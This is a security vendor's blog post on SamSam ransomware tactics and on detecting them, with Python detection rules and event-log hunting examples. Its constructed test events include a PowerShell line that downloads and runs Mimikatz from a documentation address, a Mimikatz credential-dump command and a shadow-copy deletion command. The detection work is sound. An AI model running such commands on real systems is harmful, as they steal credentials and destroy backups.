As we work with our customers to protect their organizations against the latest variants of SamSam ransomware, we’ve learned more about how it operates. We’re sharing those findings here, along with guidance on how our Threat Response module enables threat hunters to quickly detect and respond to this threat.
(Image: Pete Linforth / Pixabay)
Many organizations have fallen victim to SamSam, a ransomware variant which has been a hot topic for the past several months. Known for bringing networks to a halt, this opportunistic attack has been observed across several industry verticals including Healthcare, Government and Retail.
SamSam is not a new threat, having been observed in the wild for more than two years. After infecting networks, the threat actors extort victims for Bitcoin in exchange for decryption keys. The TTPs used by this variant are not complex, and neither is detecting them, but many organizations fall victim because they have inadequately secured their perimeter, providing an initial entry-point for a broader infection.
At Tanium, we’re helping our customers protect against and respond to recent SamSam outbreaks using our Threat Response module, which provides the ability to detect malicious activity linked to SamSam, take action against threats and address the root cause vulnerabilities that lead to infection. We’ll detail how it all works, but first we want to share what we’ve learned so far about this particular strain of ransomware.
SamSam modus operandi
The SamSam threat actors were first observed exploiting a remote code execution vulnerability in unpatched versions of the JBoss Java application server. However, over the last 18 months, the threat actors behind SamSam have taken advantage of a wider range of weaknesses to gain initial access to a victim organization. One prevalent technique focuses on hosts that expose Remote Desktop and RDP application gateways to the internet. The threat actors use simple RDP brute force tools to find commonly used or default passwords.
After the threat actors establish a foothold within a network segment, they can enumerate hosts and users on the network via native Windows commands such as NET.EXE. The attackers utilize malicious PowerShell scripts to load the Mimikatz credential harvesting utility, allowing them to obtain access to privileged accounts. By moving laterally and dumping additional credentials, attackers can eventually obtain Active Directory domain administrator or highly privileged service accounts.
Given these credentials, attackers can infect domain controllers, destroy backups and proceed to automatically target and encrypt a broader set of endpoints. The threat actors deploy and run the malware using a batch script and WMI or PsExec utilities.
Figure 1: Copy of a SamSam batch script which launches the malicious binary and sets variables.
Newer variants of SamSam can be observed referencing a “runner” file with a “.stubbin” file extension. This method loads the malware via a .NET binary which decrypts and runs the malicious binary. Once the encryption routine begins, files are encrypted and renamed with a new file extension, and a separate .html file is dropped, which acts as the ransom note. The ransom demands payment via Bitcoin and also offers free decryption of two files (not hosts) to prove they have the proper keys.
SamSam ransomware: How Tanium Threat Response can help
Threat Response includes a powerful detection capability known as “Signals,” which provides continuous monitoring and real-time alerting for malicious activity. The Tanium EDR team maintains a feed of Signals which have been written and aligned to the MITRE ATT&CK Framework in order to provide customers with high-fidelity identification of common attacker methodologies. In this section, we’ll cover how some of the out-of-the-box Signals would automatically identify components of a SamSam attack, as well as how customers can create their own custom signals.
The SamSam threat actors often utilize Mimikatz to escalate their access to an elevated user or domain administrator. The threat actors use this command (or similar variants) to download and run a PowerShell based version of Mimikatz:
Figure 2: A command observed being used by the threat actors to download and run Mimikatz via PowerShell.
The “Suspicious PowerShell Command Line” Signal identifies this PowerShell execution based on the activities it performs. Upon execution of the PowerShell command, the Signal alert reaches the Tanium console within seconds, even if the system is not on the corporate network.
Figure 3: Example of a Tanium Signal Alert for Suspicious PowerShell Command Line.
Irrespective of the command-line used, Tanium can also detect and alert upon PowerShell executed through an atypical process ancestry, which often occurs when a payload is delivered via macro malware or other exploited applications.
If an attacker opts to directly run the standalone Mimikatz executable, instead of reflectively loading it through PowerShell, Tanium’s signal feed also provides several detection mechanisms. The screenshot below shows an example of such an alert:
Figure 4: Example of Tanium Signal Alert for Mimikatz execution.
Another common tactic used by the SamSam threat actors is to ensure backup files are deleted. This makes restoration efforts significantly more difficult, which increases the likelihood their victim will pay the ransom. One method commonly used is to delete Windows Volume Shadow Copies. Tanium Threat Response detects and alerts on this activity as soon as the deletion command executes.
Figure 5: Pivoting to investigate a Tanium Signal Alert for Volume Shadow Copy Deletion.
By pivoting on the activity executed around an alert, it is possible to not only see the “vssadmin delete shadows” command, but also other actions taken at the command prompt. Tanium’s ability to visualize endpoint activity can assist in reconstructing what preceded a compromise, as well as the subsequent impact of the event.
Detecting PsExec activity
Tanium Threat Response users can create their own Signals, containing any combination of file, network, process and registry events, for real-time detection and alerting. Furthermore, Signals can be tailored and applied to specific computer groups – rather than enterprise-wide – to allow security teams to apply different levels and types of monitoring to different types of systems.
The following examples demonstrate simple Signals to detect SamSam’s usage of the Sysinternals PsExec utility, along with the use of Tanium’s enterprise hunting and search capabilities to find related anomalies. Since PsExec is often legitimately used by system administrators, these Signals may need to be customized to accommodate for false positives. In the midst of an incident, an organization might opt to accept some “noise” in the interest of rapid detection and response.
The SamSam threat actors commonly use PsExec to laterally deploy and execute a batch script which, in turn, installs the malware. The command line and file naming conventions can vary from campaign to campaign. Here’s an example of a simple Signal to detect one of the variations:
Figure 6: Example Tanium Signal alert for PSEXEC Launching BAT file.
On the receiving system, the PsExec service binary PSEXESVC.EXE will launch an instance of CMD.EXE to run the copied batch script. We can detect the resulting activity with the following Signal:
process.parent_command_line ends with 'psexesvc.exe' AND process.command_line contains 'cmd.exe /c' AND process.command_line contains '.bat'
Since Signals allow any combination of process.path, process.command_line, process.parent_path and process.parent_command_line, it’s easy to build additional detections for other variants (as well as to exclude legitimate activity). Of course, we’re just using basic process matching in these examples – users can include file, network and registry operations into the signal as well.
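The Signals discussed above, from the suspicious PowerShell command line and Mimikatz alerts through the Volume Shadow Copy deletion and the PsExec Signal, all reduce to predicates over process events. The following added Python example is not Tanium code and not the product's Signal engine; it expresses those five checks over the same field names as the Signal just shown (process.path, process.command_line, process.parent_path, process.parent_command_line) and runs them against constructed process events. The rule bodies, the regular expressions, the lists of parents and markers, and every sample command line are assumptions chosen for illustration; tune them to your environment, and expect the PsExec rule to fire on legitimate administrative use, as noted above.

```python
"""Signal-style rules for the SamSam behaviours described in this post.

Added example, not Tanium code: a small matcher using the same field names as
the post's PsExec Signal (process.path, process.command_line, process.parent_path,
process.parent_command_line). All sample events below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    path: str
    command_line: str
    parent_path: str
    parent_command_line: str

    def name(self):
        return self.path.rsplit("\\", 1)[-1].lower()

    def parent_name(self):
        return self.parent_path.rsplit("\\", 1)[-1].lower()


POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Parents that should not normally spawn PowerShell (Office and script hosts).
ATYPICAL_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                    "mshta.exe", "wscript.exe", "cscript.exe"}
# Download-cradle markers: fetch remote text and run it in memory.
CRADLE = re.compile(r"downloadstring|downloadfile|net\.webclient|"
                    r"invoke-webrequest|\biex\b|invoke-expression", re.I)
# -e/-ec/-enc/-encodedcommand followed by a base64 blob (does not match -ep).
ENCODED = re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)


def suspicious_powershell_cmdline(ev):
    """'Suspicious PowerShell Command Line': remote code or an encoded payload."""
    cl = ev.command_line
    return ev.name() in POWERSHELL and bool(CRADLE.search(cl) or ENCODED.search(cl))


def powershell_atypical_parent(ev):
    """PowerShell launched by an Office application or script host."""
    return ev.name() in POWERSHELL and ev.parent_name() in ATYPICAL_PARENTS


def mimikatz_execution(ev):
    """The standalone mimikatz binary, or its module syntax on any command line."""
    cl = ev.command_line.lower()
    markers = ("sekurlsa::", "lsadump::", "privilege::debug", "invoke-mimikatz")
    return ev.name() == "mimikatz.exe" or any(m in cl for m in markers)


def shadow_copy_deletion(ev):
    """vssadmin or wmic deleting Volume Shadow Copies ahead of encryption."""
    cl = ev.command_line.lower()
    return ((ev.name() == "vssadmin.exe" and "delete" in cl and "shadows" in cl)
            or (ev.name() == "wmic.exe" and "shadowcopy" in cl and "delete" in cl))


def psexesvc_launching_bat(ev):
    """The post's Signal, translated literally: PSEXESVC -> cmd.exe /c <x>.bat."""
    cl = ev.command_line.lower()
    return (ev.parent_command_line.lower().endswith("psexesvc.exe")
            and "cmd.exe /c" in cl and ".bat" in cl)


RULES = [
    ("Suspicious PowerShell Command Line", suspicious_powershell_cmdline),
    ("PowerShell Atypical Process Ancestry", powershell_atypical_parent),
    ("Mimikatz Execution", mimikatz_execution),
    ("Volume Shadow Copy Deletion", shadow_copy_deletion),
    ("PSEXESVC Launching BAT File", psexesvc_launching_bat),
]


def evaluate(events):
    """Return (event index, rule name) for every rule that each event matches."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [  # constructed; 203.0.113.10 is a documentation address
    ProcessEvent(PS, 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient)'
                     ".DownloadString('http://203.0.113.10/Invoke-Mimikatz.ps1'); "
                     'Invoke-Mimikatz -DumpCreds"', CMD, "cmd.exe"),
    ProcessEvent(PS, r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\inv.ps1",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 '"WINWORD.EXE" /n invoice.docm'),
    ProcessEvent(r"C:\Users\Public\mimikatz.exe",
                 'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit', CMD, "cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet",
                 CMD, "cmd.exe"),
    ProcessEvent(CMD, r"cmd.exe /c C:\Windows\Temp\deploy.bat",
                 r"C:\Windows\PSEXESVC.exe", r"C:\Windows\PSEXESVC.exe"),
    ProcessEvent(CMD, "cmd.exe /c ipconfig /all",  # legitimate admin use of PsExec
                 r"C:\Windows\PSEXESVC.exe", r"C:\Windows\PSEXESVC.exe"),
    ProcessEvent(PS, r"powershell.exe -File C:\Scripts\inventory.ps1",  # scheduled task
                 r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -s Schedule"),
]
```

Running `evaluate(SAMPLE_EVENTS)` flags the first five events and leaves the last two (an administrator's `ipconfig` over PsExec and a scheduled-task PowerShell script) alone; the first event trips both the PowerShell and the Mimikatz rule, which is the layered coverage the post describes for a script that downloads and runs Mimikatz. In a real Signal the exclusions for known-good administrative hosts would be expressed on the same fields.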
An investigator might also want to hunt for other variations of the attack that misuse PsExec. The “Trace Executed Process Trees” sensor makes it easy to compare the frequency of occurrence (count) of unique sequences of processes that launched with the PsExec service binary (PSEXESVC.EXE) as their parent. This can help pinpoint other outliers for drill-down and further analysis.
Figure 7: Comparing process trees launched by the PsExec service across hosts.
Investigators can also use Tanium to search the native Windows System Event log for Service Installation events (Event ID 7045, logged by the Service Control Manager) related to PsExec, as shown below. This provides a complementary source of evidence, as well as the ability to find evidence on hosts that may not have had Tanium deployed prior to an incident.
Figure 8: Tanium Threat Response search for PsExec service creation.
Hunting the initial means of entry: remote desktop
As mentioned earlier, recent SamSam campaigns target organizations with endpoints that expose Remote Desktop Protocol (RDP) to the internet. Automated brute-force attacks against common administrator usernames can provide initial access to these systems. Once successful, the RDP hosts can be used as a foothold to target the rest of the environment. Even if a victim manages to detect or prevent subsequent stages of the attack, failure to identify and resolve these vulnerable entry-points will leave the network susceptible to re-compromise.
Tanium can help an organization quickly identify where Remote Desktop is exposed in a network and how it’s being used. For example, users can query for all systems that are currently listening on port 3389, as well as those with record of historical network connections to and from this port. Results can be enriched and grouped with additional data points, such as network range, hostname, OS, firewall information and other relevant attributes.
Figure 9: Identifying endpoints that are actively listening on port 3389 by hostname, IP and OS.
Figure 10: Searching for historical network connections to port 3389.
Tanium Threat Response also provides the ability to search native sources, such as operating system and application event logs, for additional evidence. For example, the “Remote Desktop Event Log Search” sensor searches for historic RDP logon successes in the Windows Event Log, specifically those recorded in the Terminal Services operational logs.
Figure 11: Screenshot outlining the RDP Event log search sensor.
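The two event-log hunts above, the System log Service Installation records for PsExec and the Terminal Services operational log records for RDP logons, can be rehearsed offline against records in the Windows event XML schema. The following added Python example is not Tanium code or a Tanium sensor. It parses constructed records (documentation addresses and made-up hostnames), flags 7045 records naming PSEXESVC, lists RDP logons from event 21 (LocalSessionManager) and 1149 (RemoteConnectionManager), and counts logons per source address so an administrator session from an internet address stands out. The UserData field names follow what those providers emit; treat them as an assumption if your Windows build renders them differently.

```python
"""Offline rehearsal of two event-log hunts: PsExec service installs and RDP logons.

Added example, not Tanium code. The records are constructed in the Windows event
XML schema (System 7045 from the Service Control Manager; events 21 and 1149 from
the TerminalServices operational logs), not real captures.
"""
import xml.etree.ElementTree as ET
from collections import Counter

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
LSM = "Microsoft-Windows-TerminalServices-LocalSessionManager"
RCM = "Microsoft-Windows-TerminalServices-RemoteConnectionManager"


def parse_event(xml_text):
    """Flatten one <Event> into provider, id, computer, time and a data dict."""
    root = ET.fromstring(xml_text)
    system = root.find(NS + "System")
    ev = {"provider": system.find(NS + "Provider").get("Name"),
          "id": int(system.find(NS + "EventID").text),
          "computer": system.find(NS + "Computer").text,
          "time": system.find(NS + "TimeCreated").get("SystemTime"),
          "data": {}}
    for d in root.iter(NS + "Data"):        # classic <EventData><Data Name="...">
        ev["data"][d.get("Name")] = d.text or ""
    user_data = root.find(NS + "UserData")  # TerminalServices puts fields in <UserData>
    if user_data is not None:
        for node in user_data.iter():
            if node is not user_data and len(node) == 0:
                ev["data"][node.tag.split("}")[-1]] = node.text or ""
    return ev


def psexec_service_installs(events):
    """7045 records whose service name or image path names PSEXESVC.
    PsExec's -r switch renames the service, so review unfamiliar 7045s as well."""
    hits = []
    for ev in events:
        if ev["provider"] == "Service Control Manager" and ev["id"] == 7045:
            name, image = ev["data"].get("ServiceName", ""), ev["data"].get("ImagePath", "")
            if "psexesvc" in (name + image).lower():
                hits.append((ev["computer"], ev["time"], name, image))
    return hits


def rdp_logons(events):
    """(computer, time, user, source address) for RDP logons. 21 = session logon
    succeeded; 1149 = authentication succeeded, which without NLA only means the
    logon screen was reached, so confirm it with a matching 21 or 4624 type 10."""
    out = []
    for ev in events:
        d = ev["data"]
        if ev["provider"] == LSM and ev["id"] == 21:
            out.append((ev["computer"], ev["time"], d["User"], d["Address"]))
        elif ev["provider"] == RCM and ev["id"] == 1149:
            out.append((ev["computer"], ev["time"], d["Param2"] + "\\" + d["Param1"], d["Param3"]))
    return out


def logons_by_source(logons):
    """RDP logons per source address; an internet address with admin logons stands out."""
    return Counter(addr for _, _, _, addr in logons)


# Constructed records. 198.51.100.23 is a documentation address standing in for
# an internet source; 10.20.30.40 is an internal workstation.
EVENT_XML = [
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>
<Provider Name="Service Control Manager"/><EventID>7045</EventID><TimeCreated SystemTime="2018-06-01T02:14:07Z"/>
<Computer>FS01.corp.example</Computer></System><EventData><Data Name="ServiceName">PSEXESVC</Data>
<Data Name="ImagePath">%SystemRoot%\PSEXESVC.exe</Data><Data Name="AccountName">LocalSystem</Data></EventData></Event>""",
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>
<Provider Name="Service Control Manager"/><EventID>7045</EventID><TimeCreated SystemTime="2018-05-20T09:00:00Z"/>
<Computer>FS01.corp.example</Computer></System><EventData><Data Name="ServiceName">BackupAgent</Data>
<Data Name="ImagePath">C:\Program Files\BackupAgent\agent.exe</Data></EventData></Event>""",
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>
<Provider Name="Microsoft-Windows-TerminalServices-LocalSessionManager"/><EventID>21</EventID>
<TimeCreated SystemTime="2018-06-01T01:58:31Z"/><Computer>RDPGW01.corp.example</Computer></System>
<UserData><EventXML xmlns="Event_NS"><User>CORP\administrator</User><SessionID>3</SessionID>
<Address>198.51.100.23</Address></EventXML></UserData></Event>""",
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>
<Provider Name="Microsoft-Windows-TerminalServices-RemoteConnectionManager"/><EventID>1149</EventID>
<TimeCreated SystemTime="2018-06-01T01:58:29Z"/><Computer>RDPGW01.corp.example</Computer></System>
<UserData><EventXML xmlns="Event_NS"><Param1>administrator</Param1><Param2>CORP</Param2>
<Param3>198.51.100.23</Param3></EventXML></UserData></Event>""",
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>
<Provider Name="Microsoft-Windows-TerminalServices-LocalSessionManager"/><EventID>21</EventID>
<TimeCreated SystemTime="2018-05-31T08:12:05Z"/><Computer>RDPGW01.corp.example</Computer></System>
<UserData><EventXML xmlns="Event_NS"><User>CORP\jsmith</User><SessionID>2</SessionID>
<Address>10.20.30.40</Address></EventXML></UserData></Event>""",
]
SAMPLE_EVENTS = [parse_event(x) for x in EVENT_XML]
```

On these records `psexec_service_installs` returns only the PSEXESVC install on FS01 and `logons_by_source(rdp_logons(SAMPLE_EVENTS))` shows two administrator logons on the RDP gateway from the internet-sourced address minutes before it. Joined with the listening-port inventory described earlier, that is the entry point to close before cleaning up the rest of the intrusion.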
Going beyond Detection and Response
As a platform, Tanium’s broad set of security and IT operations capabilities can help organizations go beyond the traditional limits of EDR/EPP point solutions when responding to attacks. We’ll highlight two examples that relate back to the SamSam examples covered in this post.
Tanium Discover utilizes the Tanium architecture to efficiently identify unmanaged hosts – including those that might have services like Remote Desktop exposed to the internet or untrusted networks. Discover employs multiple means of fingerprinting endpoints with both passive and active techniques. Users can review the OS and open ports on unmanaged endpoints, create notification and alerting workflows and even block untrusted devices.
Figure 12: Reviewing managed and unmanaged devices with open RDP ports in Tanium Discover.
Figure 13: Reviewing details for an unmanaged device interface in Tanium Discover.
When it’s time to remediate, Tanium Protect can enforce Application Control policies to limit the execution of untrusted software, as well as endpoint firewall policies to limit unwanted network traffic. For example, on many sets of systems there may be no legitimate need for “powershell.exe” to initiate communications to external IP addresses on ports 80 or 443. This can hinder one of the commonly utilized techniques to execute scripts hosted on remote sites.
Figure 14: Reviewing an endpoint firewall policy in Protect.
Administrators can apply Protect policies to the same dynamic Tanium computer groups that can be defined and used throughout the platform. This makes it easier to test and deploy security controls in a staged manner, starting with endpoints that have the most consistent and stable configuration (such as domain controllers).
The tactics leveraged by the SamSam threat actors are not advanced or revolutionary; however, they highlight common deficiencies in perimeter defense and privileged account management. Having enterprise-wide visibility into these activities speeds up the threat hunting process, and validating these security controls makes it possible to proactively defend against this threat or retrace the activities of an intruder.
About the Author: Aaron Goldstein is a Director with Tanium’s Endpoint Detection and Response (EDR) Team. He joined Tanium after nine years of Incident Response consulting and threat intelligence management. During his career, Aaron has led more than 250 security engagements spanning nine countries, ranging from high profile investigations and incident response to creating and customizing full-scale cyber intrusion training exercises. Aaron leverages his unique Incident Response experience in complex, large-scale breaches to provide strategic solutions to secure environments of all sizes. He is highly skilled in translating difficult topics into easy-to-understand training sessions and utilizes his knowledge and skills to bring a unique approach to the ever-growing challenge of securing critical systems. When he is not fixated on securing the world, Aaron enjoys traveling to remote locations and hiking.